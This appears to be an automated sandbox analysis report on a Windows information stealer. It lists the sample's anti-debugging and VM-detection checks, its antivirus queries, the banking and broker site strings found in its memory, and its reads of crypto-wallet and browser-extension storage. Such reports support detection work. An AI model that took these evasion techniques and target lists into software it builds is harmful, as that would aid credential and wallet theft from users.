                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B9071F second address: 4B90725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90725 second address: 4B90729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90729 second address: 4B9072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90750 second address: 4B907FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F2A913FCE9Dh 0x0000000b sub cx, 5636h 0x00000010 jmp 00007F2A913FCEA1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, esi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F2A913FCE9Ch 0x00000022 jmp 00007F2A913FCEA5h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F2A913FCEA0h 0x0000002e add ch, FFFFFFB8h 0x00000031 jmp 00007F2A913FCE9Bh 0x00000036 popfd 0x00000037 popad 0x00000038 pop esi 0x00000039 pushad 0x0000003a mov ax, 980Bh 0x0000003e call 00007F2A913FCEA0h 0x00000043 movzx esi, dx 0x00000046 pop ebx 0x00000047 popad 0x00000048 leave 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F2A913FCEA9h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B907FB second address: 4B80032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F2A9129487Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F2A954208B1h 0x00000027 mov edi, edi 0x00000029 jmp 00007F2A91294726h 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2A91294727h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80032 second address: 4B8003A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8003A second address: 4B80060
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80060 second address: 4B80064
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80064 second address: 4B8006A
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8006A second address: 4B800D4
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B800D4 second address: 4B800D8
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B800D8 second address: 4B8010C
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8010C second address: 4B80112
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80112 second address: 4B80118
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80118 second address: 4B8012E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8012E second address: 4B80142
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80142 second address: 4B80146
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80146 second address: 4B8014C
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8014C second address: 4B80161
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80161 second address: 4B80165
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80165 second address: 4B80181
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80181 second address: 4B8019E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B801FB second address: 4B80201
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80201 second address: 4B80218
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80218 second address: 4B8024E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8024E second address: 4B80263
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80263 second address: 4B8028C
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B802B5 second address: 4B802BB
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B802BB second address: 4B8031E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8031E second address: 4B80336
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80364 second address: 4B80465
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80465 second address: 4B8047D
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8047D second address: 4B8052E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8052E second address: 4B80587
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80587 second address: 4B8058B
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8058B second address: 4B80591
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80591 second address: 4B805BB
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B805BB second address: 4B805BF
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B805BF second address: 4B805C5
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B805C5 second address: 4B805CB
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B805CB second address: 4B805CF
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B805CF second address: 4B8061E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8061E second address: 4B8062E
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8062E second address: 4B80632
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80632 second address: 4B8064F
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B8069B second address: 4B806D6
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B806D6 second address: 4B806DA
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B806DA second address: 4B806E0
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B806E0 second address: 4B806F1
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B806F1 second address: 4B707D9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B707D9 second address: 4B707FD
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B707FD second address: 4B7085B
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80A94 second address: 4B80B20
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80BA3 second address: 4B80BC0
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80BC0 second address: 4B80BC5
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80BC5 second address: 4B80BD9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80BD9 second address: 4B80BDF
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B80C4C second address: 4B80C52
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B90824 second address: 4B9082A
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B9082A second address: 4B9087F
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B9087F second address: 4B908A3
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B908A3 second address: 4B908A7
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B908A7 second address: 4B908AD
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B908AD second address: 4B908B6
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B908B6 second address: 4B908F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B908F9 second address: 4B908FF
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B908FF second address: 4B909CE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: 4B90AE4 second address: 4B90AF3
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Special instruction interceptor: First address: A18D6E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Special instruction interceptor: First address: A18E3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Special instruction interceptor: First address: BBDE4D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Special instruction interceptor: First address: A161C6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Special instruction interceptor: First address: C50C42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe TID: 4220 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe TID: 7380 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Last function: Thread delayed
                Source: Amcache.hve.11.dr Binary or memory string: VMware
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.11.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1436316095.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.11.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.11.dr Binary or memory string: vmci.sys
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.11.dr Binary or memory string: VMware20,1
                Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.11.dr Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.11.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.11.dr Binary or memory string: VMware PCI VMCI Bus Device
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.11.dr Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.11.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.11.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.11.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: tTGxYWtjG5.exe, 00000001.00000002.1911580462.0000000000BA0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual USB Mouse
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.11.dr Binary or memory string: VMware, Inc.
                Source: Amcache.hve.11.dr Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.11.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.11.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1436316095.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW+
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383492932.00000000054F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000002.1911580462.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: SICE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: tTGxYWtjG5.exe, 00000001.00000002.1911805771.0000000000BE9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.11.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: tTGxYWtjG5.exe PID: 424, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: tTGxYWtjG5.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: tTGxYWtjG5.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: tTGxYWtjG5.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474406524.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474406524.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                Source: tTGxYWtjG5.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
